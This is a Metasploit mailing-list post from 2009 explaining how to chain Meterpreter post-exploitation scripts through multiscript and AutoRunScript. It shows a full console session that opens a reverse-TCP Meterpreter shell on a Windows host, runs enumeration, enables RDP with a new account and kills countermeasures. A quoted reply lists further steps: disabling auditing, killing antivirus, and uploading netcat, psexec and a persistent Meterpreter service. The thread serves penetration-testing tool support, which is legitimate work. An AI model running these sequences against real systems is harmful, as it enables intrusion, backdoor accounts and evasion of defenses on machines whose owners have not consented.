Metasploit mailing list archives
multihandler rc :?
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Fri, 2 Oct 2009 07:06:55 -0400
I think you might be confusing the function of multiscript with a recourse file
for Meterpreter, multiscript is for chaining several meterpreter scripts
together either by giving the list with options thru the command line or in
a text file, example:
run multiscript -c "winenum;getgui -e -u support3889 -p P at ssw0rd"
----script file postscript.txt----
winenum
getgui -e -u support3889 -p P at ssw0rd
---end of script file----
run multiscript -s /tmp/postscrtipt.txt
I see you are trying to upload a toolkit to the target, you can make an auto
expanding executable and use the uploadexec script to upload the toolkit and
run it extracting to your desired folder.
do not put "run" infront of the name of each script and remove the commands
from it, you can write a custom script for those commands and invoke it from
the multiscript. I changed the message it returns when executing a script
from command to script to reduce any confusion of what it does.
carlos at loki:~/svn/msf3-dev$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 166 aux
msf > cat /tmp/samplescript
[*] exec: cat /tmp/samplescript
winenum
getgui -e -u dark -p P at ssword
getcountermeasures -k -d
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set AutoRunScript multiscript -s /tmp/samplescript
AutoRunScript => multiscript -s /tmp/samplescript
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) > [*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.171:1143)
[*] Running Multiscript script.....
[*] Running script List ...
[*] running script winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.1.171:1143...
[*] Saving report to
/home/carlos/.msf3/logs/winenum/192.168.1.171_20091002.0006-69795/192.168.1.171_20091002.0006-69795.txt
[*] Checking if WIN2K3LAB01 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -nao
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
[*] running command net accounts /domain
[*] running command net session
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net localgroup administrators
[*] running command net group administrators
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] running command tasklist /m
[*] running command gpresult /SCOPE COMPUTER /Z
..........................................
[*] running script getgui -e -u dark -p P at ssword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez at darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] running script getcountermeasures -k -d
.........................................
On Fri, Oct 2, 2009 at 5:06 AM, netevil <netevil at hackers.it> wrote:
Carlos Perez wrote:Fixed in SVN give it a tryHi Carlos, updated and tried again... but execution ends in half a second with te following on console... and no results.... David [*] Exploit running as background job. [*] Starting the payload handler... [*] Started reverse handler msf exploit(handler) > [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.253.128.106:8080 -> 192.253.128.103:1219) [*] Running Multiscript script..... [*] Running script List ... [*] running command run disable_audit.rb [*] running command run migrate.rb [*] running command run killav.rb [*] running command run winenum.rb [*] running command run scraper.rb [*] running command cd c:\ [*] running command mkdir ..- [*] running command cd ..- [*] running command mkdir giftbag [*] running command cd giftbag [*] running command upload /pentest/giftbag/psexec.exe psexec.exe [*] running command upload /pentest/giftbag/nc.exe nc.exe [*] running command upload /pentest/giftbag/metsrv.dll metsrv.dll [*] running command upload /pentest/giftbag/metsvc.exe metsvc.exe [*] running command upload /pentest/giftbag/metsvc-server.exe metsvc-server.exe _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20091002/e958bcda/attachment-0001.html>
Current thread:
- multihandler rc :? netevil (Oct 01)
- multihandler rc :? Carlos Perez (Oct 01)
- multihandler rc :? netevil (Oct 01)
- multihandler rc :? Carlos Perez (Oct 01)
- multihandler rc :? netevil (Oct 01)
- multihandler rc :? Carlos Perez (Oct 01)
- multihandler rc :? netevil (Oct 02)
- multihandler rc :? Carlos Perez (Oct 02)
- multihandler rc :? netevil (Oct 02)
- multihandler rc :? netevil (Oct 01)
- multihandler rc :? Carlos Perez (Oct 01)